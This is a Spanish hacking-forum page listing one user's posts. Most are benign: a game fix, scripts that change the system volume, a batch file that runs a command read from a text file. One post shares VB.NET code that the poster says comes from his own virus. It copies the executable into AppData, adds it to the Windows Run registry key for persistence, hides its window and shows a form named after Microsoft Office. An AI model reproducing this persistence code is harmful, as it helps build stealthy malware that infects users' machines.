Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - **Aincrad**

#331
Juegos y Consolas / Re: error UE4 fortnite
6 Abril 2018, 19:59 PM
CitarPero ayudadme mamones :c

jajajajaj XD





Intentaste utilizar alguna ayuda de las que estan en google o youtube?

intatate esta solucion:

https://www.youtube.com/watch?v=0z9JsGvJ2OU

y descargate pixelShalder 2.0 o el 3.0 y colaca los archivos dentro de la carpeta del juego.

PD: NO te puedo ayudar ya que mi Internet y mi pc son de carton.  :laugh:

#332
Foro Libre / VirusTotal Graph ayuda.
6 Abril 2018, 17:15 PM
Bueno en virus total hay una parte que me muestra esto :



Alguien Sabe para que sirve y Que quiere decir esta parte ?  :huh:

#333
Gracias por el codigo del proyecto .

Mi Antivirus Salta de una.  :-( Tengo que desactivarlo para poder Copilarlo/Depurarlo .



Bueno igual esta bueno . Gracias.
#334
Scripting / Re: Comando .bat / .vbs
6 Abril 2018, 15:26 PM
bueno solo cabía el 100 y listo.

Código (bash) [Seleccionar]

@if (@a==@b) @end /*

:: batch portion

@ECHO OFF

cscript /e:jscript "%~f0"


:: JScript portion */

var shl = new ActiveXObject("WScript.Shell");
for (var i=0; i<25; i++) {
    shl.SendKeys(String.fromCharCode(0xAE));
}


#335
Cita de: SeamosXhackers en  5 Abril 2018, 18:24 PM
Justo ahora acabo de ver un post donde alguien pone un script en batch el cual hace que el volumen del PC se ponga al máximo, mi pregunta es, ¿hay algún script que haga justo lo contrario? Este es el script para subir al máximo el volumen:


Dime que te cuesta leer , también te puse como bajarlo.  >:(

Código (bash) [Seleccionar]
@if (@a==@b) @end /*

:: batch portion

@ECHO OFF

cscript /e:jscript "%~f0"


:: JScript portion */

var shl = new ActiveXObject("WScript.Shell");
for (var i=0; i<100; i++) {
    shl.SendKeys(String.fromCharCode(0xAE));
}


Revisea el POST : https://foro.elhacker.net/scripting/comando_bat_vbs-t482191.0.html
#336
Scripting / Re: Comando .bat / .vbs
4 Abril 2018, 00:58 AM
solo hay que buscar en la internet .

te dejo un bat que encontre. (Bueno realmente es javascript  :¬¬)

Código (bash) [Seleccionar]
@if (@a==@b) @end /*

:: batch portion

@ECHO OFF

cscript /e:jscript "%~f0"


:: JScript portion */

var shl = new ActiveXObject("WScript.Shell");
for (var i=0; i<100; i++) {
    shl.SendKeys(String.fromCharCode(0xAF));
}


bueno para bajarlo es :

Código (bash) [Seleccionar]
@if (@a==@b) @end /*

:: batch portion

@ECHO OFF

cscript /e:jscript "%~f0"


:: JScript portion */

var shl = new ActiveXObject("WScript.Shell");
for (var i=0; i<100; i++) {
    shl.SendKeys(String.fromCharCode(0xAE));
}


#337
@Elektro el link del File 2 startup v1.1 esta caido .




la forma en que yo agrego los virus que hago al registro es esta:

Código (vbnet) [Seleccionar]
Imports Microsoft.Win32

Public Class Form1
   Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
        autoinicio()
        Me.Hide()
    End Sub
   
    Private Sub autoinicio()
        Dim dirPath As String = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)
        If My.Computer.FileSystem.FileExists(dirPath & "pc.exe") Then
            Microsoft_Office_2013.Timer1.Start()
        Else
            My.Computer.FileSystem.CopyFile(Application.ExecutablePath, dirPath & "pc.exe")
            Try
                Dim REGISTRADOR As RegistryKey = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", True)
                If REGISTRADOR Is Nothing Then
                    Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run")
                End If
                Dim NOMBRE As String = dirPath & "pc.exe"
                NOMBRE = NOMBRE.Remove(0, NOMBRE.LastIndexOf("\") + 1)
                REGISTRADOR.SetValue(NOMBRE, dirPath & "pc.exe", RegistryValueKind.String)
                Microsoft_Office_2013.Show()
            Catch ex As Exception
                Dim Result As DialogResult = MessageBox.Show(ex.Message, "Error as ocurrent", MessageBoxButtons.OK, MessageBoxIcon.Error)
                If Result = DialogResult.OK Then
                    End
                End If
            End Try
        End If
     End Sub
End Class


PD: Es una pequeña parte del virus de mause que publique hace unas semanas en la parte de Análisis y Diseño de Malware
#338
Cita de: CAEL20 en  9 Marzo 2018, 06:48 AM
El batch pegue está línea y ejecute todas las órdenes que contiene la línea.

Bueno usa el ejemplo que te puse en el post anterior.




ejemplo:

el archivo txt contiene :


echo Hola a todos

y el Batch :

Código (bash) [Seleccionar]
@echo off
for /f "tokens=*" %%x in (archivo.txt) do (set psw=%%x)
%psw%
pause


Espero que te sirva .  ;D
#339
Seguridad / Re: El virus Darckcomet
9 Marzo 2018, 20:21 PM